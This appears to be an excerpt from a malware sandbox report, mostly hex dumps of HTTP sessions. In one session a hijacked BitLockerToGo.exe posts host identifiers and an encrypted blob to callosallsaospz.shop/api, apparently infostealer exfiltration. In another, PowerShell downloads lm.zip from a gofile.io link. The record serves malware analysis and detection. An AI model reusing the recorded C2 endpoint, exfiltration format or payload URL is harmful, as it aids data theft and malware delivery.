                                                                              Data Ascii: 3dnJc ZfO`Jizw3sdR+\MsJ!WFQ(&j|1;}yo1Al6]AnD.-~pz~1gD/V"\Ncqnxi8l7^l(S^HRV uT7;2Q)5(0!/z],
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 33 7a bc 50 22 52 fe a2 f8 c4 39 89 3f 2e b3 06 08 22 29 03 16 ca 97 fa fc ec cb 51 ad b4 e3 59 e8 e8 bd cc 9c a4 44 21 29 8f 90 c0 20 2c b5 46 f5 45 56 76 bd 24 35 12 10 a7 35 d7 08 20 36 69 79 3a 22 a3 79 ff 42 41 6f db 85 d3 ef 9b 60 55 f9 54 8a c2 72 9b 7d 54 31 eb dc dd 48 dc c5 49 8c 2c a0 65 61 e7 62 0d 64 c0 f9 be 99 1a 67 5d ea 32 e5 3d cf 89 03 e0 09 db 8e af d9 26 6e b6 8a ae df 68 1a be 7c 10 e4 5c 57 87 1e 20 02 ed 21 8c 01 fd f5 e3 93 62 56 48 53 d7 19 37 00 9f 42 f1 58 a5 c2 b5 61 3a f9 d7 fb f8 81 4c 18 8a ca 16 4d e5 59 cf 2f e4 0c a5 df 09 13 fc 1b d0 33 b0 a1 12 db fd 3c 03 81 b3 76 41 58 ff 5e 80 17 f4 3c 43 4e 55 da 72 3b 68 6c e6 a0 58 55 c7 6a c2 2b 97 6b 53 bf 9d 7c e8 61 47 e2 ed 07 35 e2 05 c1 5d e7 ae 3b a5 4d fd a7 3f 25 5d 9f
                                                                              Data Ascii: 3zP"R9?.")QYD!) ,FEVv$55 6iy:"yBAo`UTr}T1HI,eabdg]2=&nh|\W !bVHS7BXa:LMY/3<vAX^<CNUr;hlXUj+kS|aG5];M?%]
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 3d cd 6c 50 05 c1 90 f9 06 f1 67 cd c8 d2 23 5d 14 fe ee d9 c2 b5 3e 6e 71 71 cc f5 88 08 47 5b 04 c1 44 5c 8f 0b 5a 1f 96 70 7e fb 05 aa b8 f1 4c 3a 6f 3c e8 a1 d6 f5 91 60 4d 31 3c b9 44 32 47 5d 53 a4 d9 a8 2f a8 28 b5 e3 d2 c1 85 41 89 e0 3b 13 57 8f c5 4c 00 af 1d c0 97 54 25 95 13 2c 2f 72 31 b7 ef f4 4b 14 c3 03 7d ea 68 b1 62 c5 af 3f 21 19 5a d2 25 78 8f 6e 38 4d 89 27 13 3b 77 40 0a b7 47 1e 2c 80 7d 26 63 cb 15 8e 56 7c 85 40 80 57 d6 38 d9 bd 43 c8 72 f6 55 4b bf 28 3d d1 51 9f c2 e4 b3 20 48 f8 19 c7 60 04 c6 3f 2c 0a cf 2f 84 47 3a 0e 81 c7 80 3e 8c 55 4a a5 79 af 21 b1 08 fd 56 55 13 f2 ac 96 e3 5c dd 6b b0 c6 26 c4 12 77 5d 8b 5b 23 2d 97 ac b5 9a a1 e6 63 44 d1 6f 92 dc 97 06 a7 4e b4 97 55 dc be 7a 6a 16 6b c8 45 30 c2 40 7b 66 f3 cf 3a
                                                                              Data Ascii: =lPg#]>nqqG[D\Zp~L:o<`M1<D2G]S/(A;WLT%,/r1K}hb?!Z%xn8M';w@G,}&cV|@W8CrUK(=Q H`?,/G:>UJy!VU\k&w][#-cDoNUzjkE0@{f:
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 42 2f 38 dc 0f 26 2c e6 f7 ba 11 2e 00 f4 ca 5b de 37 06 33 99 8c 4f e9 32 9f 90 d8 f5 9b 8f c6 83 53 f0 f0 07 ff dd 71 a4 f2 63 ee ff 47 34 ad 89 c3 31 65 8f b4 fc dc 75 39 15 dc 3b 4a d9 aa 2f 79 ba ae 05 7a a2 c6 e9 a5 36 5c aa eb bf a3 22 42 59 64 a1 f1 c6 a9 43 41 b5 fc e9 75 85 c5 17 0c 95 26 59 3a 58 e6 49 1b 14 81 5f 74 e7 23 30 f6 7e f6 b4 dc f0 4c 8f 9f af ce bb 39 7d b8 0c 38 2c 3c 85 bf 73 89 15 05 d9 c7 ba 9c b0 b6 c7 06 26 f2 55 21 d3 e8 dd 23 fb 58 ab 31 f7 f1 2f 08 0b 84 52 0e 65 c5 d4 d5 cc 85 5c 7e 25 39 2b 97 b0 fd 15 5c a6 a6 29 65 e0 4c 80 4c 7c b6 a0 29 66 e5 a4 b5 7d 8f de f3 1c 55 68 d7 4b b2 1c 15 f8 6b 16 f3 6b 56 5b 29 d5 af 2c 62 11 75 4f 88 28 1d 01 5c 72 b1 4c fa 88 2c 6d 10 31 fe a6 e3 c9 fd f3 8a fd 1e e3 f2 9d 57 07 4c 53
                                                                              Data Ascii: B/8&,.[73O2SqcG41eu9;J/yz6\"BYdCAu&Y:XI_t#0~L9}8,<s&U!#X1/Re\~%9+\)eLL|)f}UhKkkV[),buO(\rL,m1WLS
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 0e 76 6b de 75 6e 21 70 29 8a 7a 31 f3 42 32 b6 49 e1 39 ac f9 c0 3f 5e 6b cf ce a1 c4 13 20 f4 96 f6 90 a8 7d ff 0f 2d e4 fd 74 e3 28 c4 d3 a4 83 f0 30 bd 5e 35 61 bd 64 6c 4a 98 8e 03 e9 e7 05 96 6f b4 12 12 89 9e 7b 1b 40 b5 7e 9b ee 82 1d ea ac cb eb 85 06 c0 2f cc 86 33 8e d7 97 b4 c6 82 20 54 76 54 8c af 89 09 69 bb 91 a2 ee 7c f8 e1 b4 32 0d 4c 5a 4f 74 f8 c3 10 ce 72 b4 cc f9 9d f6 57 9e 05 fe fc 21 9e 9c b7 9d 80 ac 8e 23 84 cc 0f be ac aa 0c bd 22 9a 24 ed 55 b5 b2 b2 7e ab b7 2e ab 93 60 d4 2c 1d 4b 67 0d 6d 0a c8 7e 7b 84 69 80 46 10 a4 e3 28 d1 3c 8b 77 14 8d b8 f4 c1 73 73 b8 b4 c6 77 e8 3d f2 b0 95 48 48 18 24 3c 8c 2f 5c 85 6c 71 e0 1a 52 82 c2 f7 04 c8 16 03 77 bd ea 37 7a 0e e1 1e 83 63 e5 ab e4 1d 2f 56 22 a4 ab 71 eb f7 7f 71 ab f2 79
                                                                              Data Ascii: vkun!p)z1B2I9?^k }-t(0^5adlJo{@~/3 TvTi|2LZOtrW!#"$U~.`,Kgm~{iF(<wssw=HH$</\lqRw7zc/V"qqy
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 61 44 99 ae d9 5f 85 61 f5 9a ae b4 27 63 28 9a e3 83 1c 5c 93 9e d9 a4 e0 ef 8b 92 20 f7 c5 6c b4 66 b5 3f dc b1 f4 f6 c4 46 c0 4d 59 9a 4c 9e 82 0a 05 f6 a8 b8 bb 46 f5 76 6b 3c 91 55 e6 c1 d1 aa 30 5b 35 05 ea b8 78 9d 48 d7 e3 2c 79 14 3e ad fa 94 8c a5 14 d8 23 52 d5 0d ee 34 f9 47 53 f7 63 6c 45 ae 5c 72 45 7b b9 64 83 ed 54 74 62 f3 54 87 71 3a a0 ba 5d 1e 9a 44 84 25 4c 29 11 85 62 28 86 c4 62 4d d5 3c f8 fa 12 75 d4 2c 7b 53 fb 08 b5 05 34 23 b3 36 45 35 e0 e7 67 5c 50 97 3f 4e 81 85 63 a9 22 b9 9c 03 6d 9a 53 9f 5d d7 2f e3 ef 69 7b ac de ac 89 67 c3 68 45 93 32 f9 61 e3 34 0b 87 95 47 00 ef c4 cc d6 ef ff 91 99 d2 25 27 05 96 11 b1 3d b9 88 c9 24 24 33 ed 57 59 5f e1 47 43 dc 39 fe 91 57 63 33 5e 48 e4 11 0a 02 d4 72 f4 ed da f1 25 78 7f d6 4a
                                                                              Data Ascii: aD_a'c(\ lf?FMYLFvk<U0[5xH,y>#R4GSclE\rE{dTtbTq:]D%L)b(bM<u,{S4#6E5g\P?Nc"mS]/i{ghE2a4G%'=$$3WY_GC9Wc3^Hr%xJ
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: c6 9a 08 b4 f1 1f fe 00 fd 46 f6 8d 91 d7 25 3e 0d bb b8 2a 21 34 7f 26 7b d8 57 ea 8b f7 d4 dd 58 da 17 30 a7 07 70 66 05 33 de c5 86 42 1b c6 45 a9 3c dc dc 0b 07 c5 ad 5a a4 4c 86 2d 04 ba 90 3f fb 2c cd 71 25 2a 95 61 01 3b 85 d4 e5 9b 47 da 17 5a 13 71 e8 f5 ea f7 ef 53 e7 36 e6 cf d0 c9 1e 25 b7 79 66 93 a9 64 94 bc df 87 83 c0 4d 92 09 63 4e cc 7c c6 6c d1 78 1f 7c 2a be ad c7 bc 69 39 a7 c3 00 4a aa 0e 27 c1 0e 13 ec 8c bd 32 07 a0 0c b3 0b 16 f0 ff 57 42 e1 26 ec 71 b4 af 88 d3 13 0a 08 9f 0f 17 be d1 71 ef 82 06 8b 4d 52 1a 86 06 d6 b9 1f ae 05 4b 6d ca 31 67 fc 97 75 29 2a 72 bc 54 11 2c a8 ce 94 05 dc 54 a5 09 61 bc 9f e5 d1 7e fb 1a bd d3 eb 17 e9 e5 cc b9 c9 ce af 4f 84 ad da 97 12 2d 81 d4 5a 23 c4 15 9e ec 98 91 c6 16 eb 2d 6a e9 f5 4d 45
                                                                              Data Ascii: F%>*!4&{WX0pf3BE<ZL-?,q%*a;GZqS6%yfdMcN|lx|*i9J'2WB&qqMRKm1gu)*rT,Ta~O-Z#-jME
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 3a b1 f5 56 a3 46 09 66 0f 7c 4c 68 ea 1d 72 9d 06 f0 dd e5 73 ca d9 33 bc 95 e7 29 85 46 2e 9d a1 a4 9c 63 57 56 c6 c6 f4 4e 05 86 44 ea 37 65 30 84 79 0e f7 c8 84 b4 71 bf a2 de b1 b6 10 87 06 07 3c c9 76 a3 0a 7b 4f b7 1c 1c 66 da 89 8a d3 9e 10 3b 35 97 b2 1e 18 99 80 6e 22 b5 7f 7e 41 4a 3b 98 1b ae 71 de 60 d0 9d aa a6 73 c8 99 ce 00 6b 4e e5 c9 cf c7 04 a1 f0 49 64 6f 8b 8b 4f 01 9c c4 f3 ce 4b 1d d5 26 87 81 88 3c bf f2 b6 b3 f7 97 ee b1 1b 4f 8a 74 24 1d 92 1f 39 7d 2e c0 0d 9c 17 b6 d9 71 34 3f e0 78 cf a5 0e 4a 3f 57 9a eb 75 57 48 2c e4 f1 d5 b9 69 f1 41 3c 32 ff 23 ed 60 09 21 98 5e b9 9e ba 67 95 00 9d 25 f9 62 1d 1d 2a 4e ce bb 74 52 27 97 11 39 71 ac df 04 ca 34 71 9e 44 70 1a 53 8e 78 5f 07 6b 28 8b f1 b4 f8 8a 93 e3 13 27 0f 8d f1 c6 a2
                                                                              Data Ascii: :VFf|Lhrs3)F.cWVND7e0yq<v{Of;5n"~AJ;q`skNIdoOK&<Ot$9}.q4?xJ?WuWH,iA<2#`!^g%b*NtR'9q4qDpSx_k('
                                                                              2024-07-27 12:53:31 UTC4096INData Raw: 34 02 0a 6c 1e bc a6 59 40 b8 41 3d 0e 24 4e 66 dc 6d 19 d4 b0 73 28 7c b0 e5 f2 82 51 cf 80 02 43 34 45 2a 9a 8c 3c 60 2f d1 7b 7f 0b 5f 2a 3e 10 b3 8a ab 82 8b e6 6a f1 a1 5e 1b b8 8f 71 db 09 d9 be 39 83 6f 1e 51 d4 3c 3f 80 8c 5d 7a 31 6e b3 89 67 c0 30 d7 df c0 f0 1e ed e0 92 d9 a7 09 0f b6 9c 47 81 a8 12 48 60 10 4f 14 0c d3 15 ca 54 23 e5 5d 6e c5 03 e5 10 9a f0 3e b4 02 26 e8 b9 01 a6 65 79 5b 7b 66 b2 5c 70 b9 16 d5 26 f9 e8 5e e9 ea 5f 00 b7 73 25 b9 f9 5b 5e 3e 82 1f 48 f2 6c 61 0b cf e4 cd d2 33 e4 c8 4c 19 05 b7 09 57 69 33 c0 b2 9a 94 93 2b dd 7c 16 b4 60 18 99 a7 c8 d2 de 5c c7 7e 8b 11 30 93 37 15 e0 02 01 c1 b1 78 df f0 1c 5a 35 e4 ab 35 1b 06 54 d1 af 73 88 df e2 29 cb b9 b3 48 0a ab 78 5d 2b 7d 88 a5 e6 28 f3 1d 1d f6 db 5c 10 cd f6 2c
                                                                              Data Ascii: 4lY@A=$Nfms(|QC4E*<`/{_*>j^q9oQ<?]z1ng0GH`OT#]n>&ey[{f\p&^_s%[^>Hla3LWi3+|`\~07xZ55Ts)Hx]+}(\,


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              14192.168.2.449781188.114.97.34437784C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:31 UTC286OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 18158
                                                                              Host: callosallsaospz.shop
                                                                              2024-07-27 12:53:31 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 43 32 36 30 43 33 46 46 35 33 41 36 41 32 36 42 32 36 32 33 42 44 38 41 41 31 32 34 30 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 62 4f 4b 48 4e 4d 2d 2d 0d 0a 2d 2d 62
                                                                              Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F2C260C3FF53A6A26B2623BD8AA12404--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"bOKHNM----b
                                                                              2024-07-27 12:53:31 UTC2827OUTData Raw: 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af 16
                                                                              Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                              2024-07-27 12:53:32 UTC808INHTTP/1.1 200 OK
                                                                              Date: Sat, 27 Jul 2024 12:53:32 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=o7rd1eun10fg849hvl2iqnle38; expires=Wed, 20-Nov-2024 06:40:11 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              CF-Cache-Status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xblJ5iqbHoW5cvFZK91pwzaLj11Mq4ndJL77kg4lupSjrFzJnHUA2p5Fzg2Bc9%2BuRzsACFKhIEFwIylFipGnmZWWy6PK%2FuxsAGxuLAkvUsQqONCyXTeMLIrPQk2lh%2FH3wJRTMaGYbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8a9cc5db0be71825-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2024-07-27 12:53:32 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                                                                              Data Ascii: eok 8.46.123.33
                                                                              2024-07-27 12:53:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              15192.168.2.44978231.14.70.2454435900C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-07-27 12:53:32 UTC196OUTGET /download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                              Host: store4.gofile.io
                                                                              2024-07-27 12:53:32 UTC577INHTTP/1.1 200 OK
                                                                              Server: nginx/1.27.0
                                                                              Date: Sat, 27 Jul 2024 12:53:32 GMT
                                                                              Content-Type: application/zip
                                                                              Content-Length: 528925
                                                                              Connection: close
                                                                              Accept-Ranges: bytes
                                                                              Access-Control-Allow-Headers: Accept, Accept-Language, Content-Language, Content-Type, Content-Length, Range, Authorization
                                                                              Access-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE
                                                                              Access-Control-Allow-Origin: *
                                                                              Access-Control-Expose-Headers: Cache-Control, Content-Encoding, Content-Range
                                                                              Content-Disposition: attachment; filename*=UTF-8''lm.zip
                                                                              Last-Modified: Sat, 20 Jul 2024 15:36:00 GMT
                                                                              2024-07-27 12:53:32 UTC512INData Raw: 50 4b 03 04 14 00 00 00 08 00 15 7b f3 58 c4 92 38 a6 85 28 05 00 fb 29 05 00 08 00 00 00 64 61 74 61 2e 62 69 6e 00 1f 2c e0 d3 60 9c e8 00 00 00 00 5e b9 dc 29 05 00 b2 c8 30 94 0e 17 00 00 00 02 94 0e 17 00 00 00 e2 f0 92 75 77 e0 85 72 c2 bd 55 09 ce ca ca 84 3b 3f 3f 0e c2 8b 6b 30 14 f1 48 5f 7b 5a 41 91 0d 98 6b bd 94 61 e5 1b 0f c7 0d e8 65 1b 1e 86 14 20 20 20 20 20 de 75 6a 5f b1 2f fb 26 7b 45 0a be 05 ce 79 a3 39 b7 9a 41 a5 20 83 99 3c e6 22 4c 5c 50 75 cc ac e5 bf bb 2b 64 04 96 20 44 f6 f2 9e fe a4 c7 03 8b c5 fc 9a db 81 f9 b6 56 87 3e 30 c0 10 f4 29 a7 48 41 3b 11 24 9d e8 5a 82 2f 28 ea db 56 e9 10 b5 2d be c2 89 6f 5a b4 5b 18 da 65 94 95 19 65 cb 0e 2a 07 ab d8 36 9d 69 45 5b bd d9 93 47 b7 30 36 34 d4 e2 c4 5e 50 b0 df 6a 5e a1 fd 2a
                                                                              Data Ascii: PK{X8()data.bin,`^)0uwrU;??k0H_{ZAkae uj_/&{Ey9A <"L\Pu+d DV>0)HA;$Z/(V-oZ[ee*6iE[G064^Pj^*
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: 27 7d 90 93 89 da 18 99 b1 94 27 99 fd a0 93 e7 48 02 6b 2d bf a3 8c cf 47 1d 47 18 b1 7d d1 23 48 8c 6f 8f 14 00 b5 e3 85 16 01 43 9f ef 87 c1 f8 68 45 38 ef 5c 98 95 fd 4e 04 cc e7 73 c6 fe a3 87 fb 83 4e 0e 0e 5e 87 7c 3a 7b fc f9 c6 40 d8 2e d9 11 c1 98 1e c0 6c 01 91 60 e7 7b 11 43 ce 3f b8 b4 aa 26 76 18 4e 79 ac 1a 34 88 25 f7 a1 16 f3 5c 88 f8 d1 c8 c3 19 7f 9b 71 cb f2 f2 f2 f2 f2 f2 f2 f2 f0 f1 f1 f1 ed ee ee ee ee ee ee ee ec 99 58 af a5 d8 11 da 20 4f e9 7e 4b 0f 70 94 c2 78 d6 ba de 37 19 00 6d 11 92 09 11 8d 01 47 a5 36 46 65 a2 bf 75 a7 f3 1d 24 c7 73 1a 5b dd fb ff 13 f5 3b d7 71 8e 98 2a cc ac 29 7c 76 26 e1 ea 12 0c 30 3a 30 8f 15 4d 3a a3 21 ff 92 36 82 b3 00 37 e1 ab 75 bb d9 ed d8 8f f9 21 c4 33 14 d9 8d ae 44 8e 10 09 58 e8 1d a1 b5
                                                                              Data Ascii: '}'Hk-GG}#HoChE8\NsN^|:{@.l`{C?&vNy4%\qX O~Kpx7mG6Feu$s[;q*)|v&0:0M:!67u!3DX
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: af 24 7f ff a8 11 2f 31 d0 dd 50 69 a0 b2 c6 b1 ed 2e ae a6 dd b7 c5 cf 9c 12 39 04 10 4c d5 e5 3a 1d eb fb 06 97 dc 93 15 25 25 62 81 da 82 5a 94 70 f6 94 67 ed 55 5c 3a 9b 40 dc 02 ce c0 22 2a 1f a4 47 f6 56 d3 c0 8f f2 9c 4f b6 f8 94 f5 31 a0 d4 85 3e 8a 20 95 35 69 c6 8f ad 42 5e 48 56 41 db 31 da d4 55 49 bb cb fb b6 d6 3f 1a f2 c3 32 46 15 ad bd 66 51 51 10 1e 41 2e f0 ac ac 53 b9 5e c4 17 fd 47 5e a6 5e c5 68 36 74 62 20 f9 f2 25 b4 01 58 94 71 98 14 86 ad ef 40 84 6a ca 90 2b 3d 86 9b 44 37 ee b0 84 6a dc 84 c0 51 8d d3 61 f8 ff 92 d1 c0 9b 95 36 cf ef 2b 19 05 80 ee 3f d7 a5 27 c9 e8 6b a5 8e de c5 39 89 c1 41 be 2f bd 19 5d 7f 8d 27 76 c6 ab b7 aa e4 9f 05 f5 d8 b4 cd e0 d1 b3 2b 7b 0c c7 e5 f2 4d d8 f6 f9 54 bd 4a f5 e3 0a 21 5a e9 76 4a c6 19
                                                                              Data Ascii: $/1Pi.9L:%%bZpgU\:@"*GVO1> 5iB^HVA1UI?2FfQQA.S^G^^h6tb %Xq@j+=D7jQa6+?'k9A/]'v+{MTJ!ZvJ
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: dd b2 3e 61 5e 59 f4 fe a7 cb 64 4f af 06 49 5b 21 dd d2 12 6b b1 b0 74 54 58 ea f5 57 7f a7 e9 95 6f 72 39 4a 59 b1 da 34 09 19 46 8a 36 b1 ca 31 5f 02 91 31 6f ee c6 98 2f e4 4e d1 63 a7 74 ef d0 a0 8a 24 dd a7 63 9c 7e d9 1e 22 89 03 84 74 b4 81 be 0a 14 81 d1 b6 b6 fc e3 2e cc ea 56 08 c2 ca 9a 0d 9e 5c a8 af e7 02 d2 39 cb 4e e8 24 58 3a c8 4a b7 81 9b 1d a3 ab f5 71 20 cc df d9 65 a6 6e d7 63 ce bd a4 48 3b 9a 8c 9a 1a 8c cf 4b 6a e2 2e e6 a5 ac d1 38 9e 37 02 18 9c 45 6e 16 a5 48 34 00 2f 2c 7f 18 6f 60 61 c3 63 e5 a1 de 7f 09 36 81 38 41 c2 d4 5b 83 07 64 cb a2 cf bc c0 16 e5 04 f9 86 d6 95 ee 1f 37 1e 18 c8 6b 50 98 ce 9c 7d a0 92 4b 16 50 df 88 0e 68 10 93 3b 8c 17 4b 6b f4 1d 47 19 0f ad 68 78 70 ef da 81 5c 50 75 e1 85 70 af 04 07 b6 1f fc e4
                                                                              Data Ascii: >a^YdOI[!ktTXWor9JY4F61_1o/Nct$c~"t.V\9N$X:Jq encH;Kj.87EnH4/,o`ac68A[d7kP}KPh;KkGhxp\Pup
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: 00 17 06 b8 0c 9c 9c f8 87 f3 40 ca be 10 75 b5 55 5d 7e 13 de 84 67 8b e8 af 39 c0 22 80 2c 4c eb 09 fa 21 a0 62 54 d7 30 fd 53 f8 21 92 70 71 91 2a 79 43 5b e3 5c 65 ef a8 6e aa 92 76 c1 e1 6b c1 13 76 cc 1f ca 04 ab 1c c6 2c 57 2c b6 df 66 b2 68 b5 6c 8b 54 00 1c 22 7c 26 10 e0 7e 05 de 50 88 cf 4b 7e 5e 9d 6a f1 f0 2e 9c 66 ca 74 51 87 cc 70 0b a7 7a 2c ef 04 d0 7c b8 bc 81 9b 37 f7 75 09 58 a7 e3 e3 80 16 6f 25 3a 84 19 15 18 d8 5f 29 86 a5 66 40 f2 d3 40 0b ed 8d 87 ba cf fb 3a 31 8b 4a dd d9 15 34 f7 8e 8d b0 02 37 0d d9 6e cc d0 aa 51 cc f9 7f 6d 53 a1 4a f6 c8 78 e8 3d d0 a9 62 8b 1c 1b 6c 90 ff 61 b0 56 07 6e e9 bb 2c cf 05 30 00 9a 4f 51 b0 bb ac 2e 3a 3d d4 a3 00 c6 ed 0d 65 a9 c3 a6 56 65 cb c9 07 de 2c 36 da a4 87 c7 d6 1b 73 3a 88 17 5c ab
                                                                              Data Ascii: @uU]~g9",L!bT0S!pq*yC[\envkv,W,fhlT"|&~PK~^j.ftQpz,|7uXo%:_)f@@:1J47nQmSJx=blaVn,0OQ.:=eVe,6s:\
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: ee cf 5a 9d 22 b8 98 cd a0 f8 78 46 c4 71 0d d5 e5 08 fd f8 3d bf 4c 7f c1 fe e2 f6 7e 36 6e 1f 5b db f4 b7 0a 85 37 67 fd 8c 70 e0 a7 7f 86 c9 7b be 31 50 e7 9e 6b e0 73 3e 94 09 9d 14 54 39 20 28 6d 03 b6 a3 d3 94 89 52 dc de b4 5a c9 e8 1b f2 96 f4 f0 b0 7d d5 91 e2 34 0e c7 05 3b ea ff e7 08 81 81 82 bd d6 5f d3 4f a1 97 b2 55 ea 70 9c bb 11 15 23 ae b8 83 6f 06 ee 54 9c 27 95 21 94 a5 14 13 f3 29 cf c8 e5 ee 5d 76 dc 9d 06 7a da ff 0f 51 97 e0 e1 a0 0b ef cc 4c f5 1b a4 83 c5 60 48 d5 dc 82 1b 32 5c 3d 5a 03 df 69 a7 94 ad cd b0 0a c9 3a 1c da 87 e0 02 e3 64 88 b2 fb c3 ce c2 21 65 67 ee a2 d3 d2 be 87 5c 47 21 db b8 53 8c 29 9d 5b 62 95 19 26 f2 9d 64 25 bb 00 3c ff 4b c8 01 dd c8 8c a9 b4 47 87 cf 7b b2 b2 04 a1 49 d6 91 87 63 f2 bd 19 99 23 a1 52
                                                                              Data Ascii: Z"xFq=L~6n[7gp{1Pks>T9 (mRZ}4;_OUp#oT'!)]vzQL`H2\=Zi:d!eg\G!S)[b&d%<KG{Ic#R
                                                                              2024-07-27 12:53:32 UTC4096INData Raw: 9b 09 13 39 5c 5c 64 9f ab f1 3f b6 09 8a 2d bc 4d 0f 4a 6f 9f 88 dd d8 95 aa 8c cc e4 76 8c 81 9d de 39 42 71 ee cd c5 58 cb b0 3c 57 13 8c 89 5a e8 2e 60 17 bc d0 7a 76 4b a5 79 72 cc 16 98 fe fd f1 f2 a3 36 95 dd e8 5d 4b 60 d4 37 b4 bf 2f 1e c3 03 56 cf 5a 82 de d5 66 25 36 5a a2 14 37 a5 36 b4 cb 40 3c 7c 76 c5 a2 87 71 ba 19 73 90 56 0b a5 04 51 d4 aa e0 68 f0 fb 3f 10 a3 ad 97 3a 16 ec 6a 97 a7 e3 83 a3 b9 4a 75 d7 28 b0 07 ee 02 c9 a1 86 65 3e 0b fc df 38 ca 60 05 2e bd 36 c8 b7 bc 06 74 e9 91 cf 50 2f c6 d8 dc 29 f0 43 57 34 ad 01 cb 85 af a6 0a 1e 74 d2 5f 41 70 f1 c8 64 ba f5 73 77 7e c6 ee b3 b9 9e 31 13 67 51 c4 8d 93 cf f9 33 64 bb 53 ea df 91 c1 20 c8 cb e8 75 ea 85 3b 7e 3a 4a 13 52 8e ba a7 da 83 e0 2b 7e 14 43 46 2c d0 ff 53 3c f0 c2 08
                                                                              Data Ascii: 9\\d?-MJov9BqX<WZ.`zvKyr6]K`7/VZf%6Z76@<|vqsVQh?:jJu(e>8`.6tP/)CW4t_Apdsw~1gQ3dS u;~:JR+~CF,S<
